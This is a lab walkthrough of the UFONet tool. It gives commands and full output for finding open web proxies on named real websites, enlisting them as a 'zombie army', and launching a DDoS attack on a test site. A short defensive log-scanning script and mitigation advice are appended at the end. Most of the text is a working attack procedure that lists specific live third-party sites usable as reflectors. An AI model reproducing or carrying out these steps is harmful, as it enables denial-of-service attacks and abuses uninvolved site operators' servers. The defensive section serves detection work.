UFOnet Tool - zombie attack
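This lab walks through a scenario in which zombie PCs are located on the Internet and then used to launch a DDoS attack against a target system. The tool used is ufonet.
1. Download the ufonet tool on Kali Linux.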
https://sourceforge.net/projects/ufonet/files/latest/download
wget https://jaist.dl.sourceforge.net/project/ufonet/ufonet-v1.3.zip
2. Unzip the downloaded tool.
root@kali:~# unzip -x ufonet-v0.8.zip
unzip -x ufonet-v1.3.zip
3. Change into the extracted directory.
cd /root/ufonet
4. Use the tool to search for zombie PCs.
root@kali:~/ufonet# ./ufonet -s 'proxy.php?url=' --se 'google'
===============================================================
888 888 8888888888 .d88888b. 888b 888 888
888 888 888 d88P Y888b 8888b 888 888
888 888 888 888 888 88888b 888 888
888 888 8888888 888 888 888Y88b 888 .d88b. 888888
888 888 888 888 888 888 Y88b888 d8P Y8b 888
888 888 888 888 888 888 Y88888 88888888 888
Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
UFONet - DDoS Botnet via Web Abuse - by psy
===============================================================
Searching for NEW 'zombies' (not present on your list) using: google
======================
[Error] - This search engine is not supported!
Wanna try a different search engine (Y/n) Y (let's try a different search engine)
Search engines available: (the tool lists the search engines that can be used)
-------------------------
+ bing
+ yahoo
-------------------------
Ex: ufonet -s 'proxy.php?url=' --se 'bing'
Bye!
UFONet - DDoS Botnet via Web Abuse - by psy
==================================================================
Searching for NEW 'zombies' (not present on your list) using: yahoo
======================
+Victim found: https://armwrestling-rus.ru/proxy.php?url=
------------
+Victim found: https://geecon.ru/proxy.php?url=
------------
+Victim found: http://www.coolespiele.com/proxy.php?url=
------------
+Victim found: http://www.kaixin001.com/login/seclogin.php?url=%2Finterface%2Fdomain_proxy.php%3Ftype%3D4/RK=0/RS=14bj4bO50EKeNTmIqwiiWY0nuIY-proxy.php?url=
------------
+Victim found: http://inchscaled.com/imgproxy.php?url=
------------
+Victim found: https://flex.nationsds.com/proxy.php?url=
------------
+Victim found: http://www.gosstandart.gov.by/SiteSearchProxy.php?UrlEntrant=7&words=%D1%80%D0%B5%D0%B5%D1%81%D1%82%D1%80/RK=0/RS=iy.ejpqDXmU5MELg3nUdAlfEnSA-proxy.php?url=
------------
+Victim found: https://services.aspectfoundation.org/hf/resource_proxy.php?url=
------------
======================
+Possible Zombies: 8 (8 candidate zombie PCs)
======================
Wanna check if they are valid zombies? (Y/n) y
Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 8
---------------------
Zombie: www.kaixin001.com
Status: Ok [200]
----------
Zombie: www.coolespiele.com
Status: Ok [200]
----------
Zombie: flex.nationsds.com
Status: Ok [200]
----------
Zombie: inchscaled.com
Status: Ok [302]
----------
Zombie: armwrestling-rus.ru
Status: Ok [200]
----------
Zombie: geecon.ru
Status: Ok [200]
----------
Zombie: services.aspectfoundation.org
Status: Ok [200]
----------
Zombie: www.gosstandart.gov.by
Status: Ok [200]
----------
==================
OK: 8 Fail: 0
==================
======================
Checking for payloads:
======================
Trying: 8
---------------------
Vector: http://www.kaixin001.com/login/seclogin.php?url=%2Finterface%2Fdomain_proxy.php%3Ftype%3D4/RK=0/RS=14bj4bO50EKeNTmIqwiiWY0nuIY-proxy.php?url=
Status: Waiting to your orders...
----------
Vector: http://inchscaled.com/imgproxy.php?url=
Status: Waiting to your orders...
----------
Vector: http://www.coolespiele.com/proxy.php?url=
Status: Not ready...
----------
Vector: https://flex.nationsds.com/proxy.php?url=
Status: Not ready...
----------
Vector: https://armwrestling-rus.ru/proxy.php?url=
Status: Not ready...
----------
Vector: https://services.aspectfoundation.org/hf/resource_proxy.php?url=
Status: Not ready...
----------
Vector: https://geecon.ru/proxy.php?url=
Status: Waiting to your orders...
----------
Vector: http://www.gosstandart.gov.by/SiteSearchProxy.php?UrlEntrant=7&words=%D1%80%D0%B5%D0%B5%D1%81%D1%82%D1%80/RK=0/RS=iy.ejpqDXmU5MELg3nUdAlfEnSA-proxy.php?url=
Status: Waiting to your orders...
----------
==================
OK: 4 Fail: 4
==================
==================
Army of 'zombies'
==================
------------------
Total Army: 4
------------------
Wanna update your army (Y/n) y
-------------------------
[Info] - Botnet updated! ;-)
UFONet - DDoS Botnet via Web Abuse - by psy
==================================================================
Inspecting target to find the best place to attack... SSssh!
======================
+Image found: Images/logo.gif
(Size: 4933 Bytes)
------------
+Style (.css) found: styles.css
(Size: 3390 Bytes)
------------
+Webpage (.html) found: Templatize.asp?item=html/about.html
(Size: 3700 Bytes)
------------
+Webpage (.asp) found: Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp
[Error] - Unable to retrieve info from Webpage
(Size: 0 Bytes)
------------
+Webpage (.asp) found: Search.asp
(Size: 1919 Bytes)
------------
===================================================================
Total objects found: 5
--------------------
images: 1
.mov : 0
.jsp : 0
.avi : 0
.html : 1
.mpg : 0
.asp : 2
.mp3 : 0
.js : 0
.ogv : 0
.wmv : 0
.css : 1
.mpeg : 0
.xml : 0
.php : 0
.txt : 0
.webm : 0
.ogg : 0
.swf : 0
--------------------
=================================================================
=Biggest File: http://testasp.vulnweb.com/Images/logo.gif
================================================================
root@kali:~/ufonet# ./ufonet -t 'botnet/zombies.txt' -a http://testasp.vulnweb.com
===========================================================================
UFONet - DDoS Botnet via Web Abuse - by psy
===========================================================================
Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 14
---------------------
Zombie: www.kaixin001.com
Status: Ok [200]
----------
Zombie: validator.w3.org
Status: Ok [200]
----------
Zombie: inchscaled.com
Status: Ok [302]
----------
Zombie: geecon.ru
Status: Ok [200]
----------
Zombie: www.gosstandart.gov.by
Status: Ok [200]
----------
==================
OK: 5 Fail: 0
==================
======================
Checking for payloads:
======================
Trying: 5
---------------------
Vector: http://www.kaixin001.com/login/seclogin.php?url=%2Finterface%2Fdomain_proxy.php%3Ftype%3D4/RK=0/RS=14bj4bO50EKeNTmIqwiiWY0nuIY-proxy.php?url=
Status: Waiting to your orders...
----------
Vector: http://inchscaled.com/imgproxy.php?url=
Status: Waiting to your orders...
----------
Vector: https://geecon.ru/proxy.php?url=
Status: Waiting to your orders...
----------
Vector: https://validator.w3.org/check?uri=
Status: Waiting to your orders...
----------
Vector: http://www.gosstandart.gov.by/SiteSearchProxy.php?UrlEntrant=7&words=%D1%80%D0%B5%D0%B5%D1%81%D1%82%D1%80/RK=0/RS=iy.ejpqDXmU5MELg3nUdAlfEnSA-proxy.php?url=
Status: Waiting to your orders...
----------
==================
OK: 5 Fail: 0
==================
==================
Army of 'zombies'
==================
------------------
Total Army: 5
------------------
Wanna update your army (Y/n)y
-------------------------
[Info] - Botnet updated! ;-)
===========================================================================
UFONet - DDoS Botnet via Web Abuse - by psy
=======================================================
Attacking: http://testasp.vulnweb.com
=======================================================
=====================
Round: 'Is target up?'
=====================
[Info] From here: YES
---------------------
[Info] From exterior: YES
---------------------
[Info] Your target looks ONLINE!. Wanna start a DDoS attack? (y/N) y
==========================================
Starting round: 1 of 1
==========================================
[Info] Deploying heavy alien troops with 'laser-cannon' weapons...
[Info] Firing from: http://nibbler.silktide.com/en_US/report/submit
[Info] Deploying droids with 'light-laser' weapons...
[Info] Firing from: http://jigsaw.w3.org/css-validator/validator?uri=testasp.vulnweb.com&profile=css3&usermedium=all&vextwarning=true
[Info] Aiming 'plasma' cannon reflector turrets...
[Info] Firing from: http://cheeseballchick.com/xmlrpc.php
[Info] Sending your 'herd' of zombies...
[Info] Attacking from: www.gosstandart.gov.by
[Info] Attacking from: www.kaixin001.com
[Info] Attacking from: validator.w3.org
[Info] Attacking from: geecon.ru
[Info] Attacking from: inchscaled.com
[Info] Flying some UCAV with 'heat-beam' weapons...
[Info] UCAV: http://www.downforeveryoneorjustme.com/ -> HIT! || Report: ONLINE! [Keep shooting!]
---------------------
==========================================
Herd statistics
==========================================
Zombie : http://inchscaled.com/imgproxy.php?url= | 1 hits 0 fails 0 retries
Times: 0:00:02.897262 total 0:00:02.897262 min 0:00:02.897262 avg 0:00:02.897262 max
Sizes: 2.6KiB total 2.6KiB min 2.6KiB avg 2.6KiB max
---------------------
Zombie : https://geecon.ru/proxy.php?url= | 1 hits 0 fails 0 retries
Times: 0:00:01.865758 total 0:00:01.865758 min 0:00:01.865758 avg 0:00:01.865758 max
Sizes: 3.2KiB total 3.2KiB min 3.2KiB avg 3.2KiB max
---------------------
Zombie : http://www.kaixin001.com/login/seclogin.php?url=%2Finterface%2Fdomain_proxy.php%3Ftype%3D4/RK=0/RS=14bj4bO50EKeNTmIqwiiWY0nuIY-proxy.php?url= | 1 hits 0 fails 0 retries
Times: 0:00:00.451141 total 0:00:00.451141 min 0:00:00.451141 avg 0:00:00.451141 max
Sizes: 35.5KiB total 35.5KiB min 35.5KiB avg 35.5KiB max
---------------------
Zombie : http://www.gosstandart.gov.by/SiteSearchProxy.php?UrlEntrant=7&words=%D1%80%D0%B5%D0%B5%D1%81%D1%82%D1%80/RK=0/RS=iy.ejpqDXmU5MELg3nUdAlfEnSA-proxy.php?url= | 1 hits 0 fails 0 retries
Times: 0:00:02.094619 total 0:00:02.094619 min 0:00:02.094619 avg 0:00:02.094619 max
Sizes: 131.1KiB total 131.1KiB min 131.1KiB avg 131.1KiB max
---------------------
Zombie : https://validator.w3.org/check?uri= | 1 hits 0 fails 0 retries
Times: 0:00:02.600004 total 0:00:02.600004 min 0:00:02.600004 avg 0:00:02.600004 max
Sizes: 13.6KiB total 13.6KiB min 13.6KiB avg 13.6KiB max
---------------------
====================================================================
Zombie 0day: http://inchscaled.com/imgproxy.php?url= with 1 hits
====================================================================
Total invocations: 5 | Zombies: 5 | Hits: 5 | Fails: 0
Total time: 0:00:09.908784 | Avg time: 0:00:01.981757
Total size: 185.9KiB | Avg size: 37.2KiB
---------------------
==========================================
Troops statistics
==========================================
Aliens: 1 | Hits: 1 | Fails: 0
Droids: 1 | Hits: 1 | Fails: 0
UCAVs : 1 | Hits: 1 | Fails: 0
XRPCs : 1 | Hits: 1 | Fails: 0
---------------------
=====================
[Info] - Attack completed! ;-)
root@kali:~/ufonet#
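The "zombies" in the output above are ordinary web sites whose scripts fetch whatever address is passed in a url= or uri= parameter. The following is an added example, not part of the original lab or of UFONet, showing how a site operator can check an access log to see whether their own proxy script is being used this way. The log lines, host names and the OWN_HOSTS allowlist are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; all addresses and hosts are placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "HEAD /proxy.php?url=http://target.example/Images/logo.gif HTTP/1.1" 200 0
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /proxy.php?url=http://target.example/Images/logo.gif HTTP/1.1" 200 4933
203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /proxy.php?url=http%3A%2F%2Ftarget.example%2Fstyles.css HTTP/1.1" 200 3390
192.0.2.44 - - [01/Jan/2024:10:00:04 +0000] "GET /proxy.php?url=/local/banner.png HTTP/1.1" 200 812
192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
URL_PARAMS = {"url", "uri"}         # parameter names seen in the vectors listed above
OWN_HOSTS = {"www.mysite.example"}  # assumption: hosts this proxy may legitimately fetch


def external_fetches(log_text, own_hosts=OWN_HOSTS):
    """Yield (client_ip, fetched_host) for requests that make this site fetch a foreign URL."""
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand
        client = line.split(" ", 1)[0]
        query = urlsplit(m["path"]).query
        # parse_qsl percent-decodes values, so encoded URLs are caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() not in URL_PARAMS:
                continue
            host = urlsplit(value).hostname  # None for relative paths
            if host and host.lower() not in own_hosts:
                yield client, host.lower()


def reflector_report(log_text, threshold=2):
    """Return {fetched_host: hits} for foreign hosts fetched at least `threshold` times."""
    hits = Counter(host for _, host in external_fetches(log_text))
    return {host: n for host, n in hits.items() if n >= threshold}


if __name__ == "__main__":
    for host, n in reflector_report(SAMPLE_LOG).items():
        print(f"proxy endpoint fetched {host} {n} times on behalf of outside clients")
```

A non-empty report means the script fetches foreign URLs on request; restricting it to an allowlist of destination hosts, or removing it, stops the site from being listed as a vector.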
Reference site: https://ufonet.03c8.net/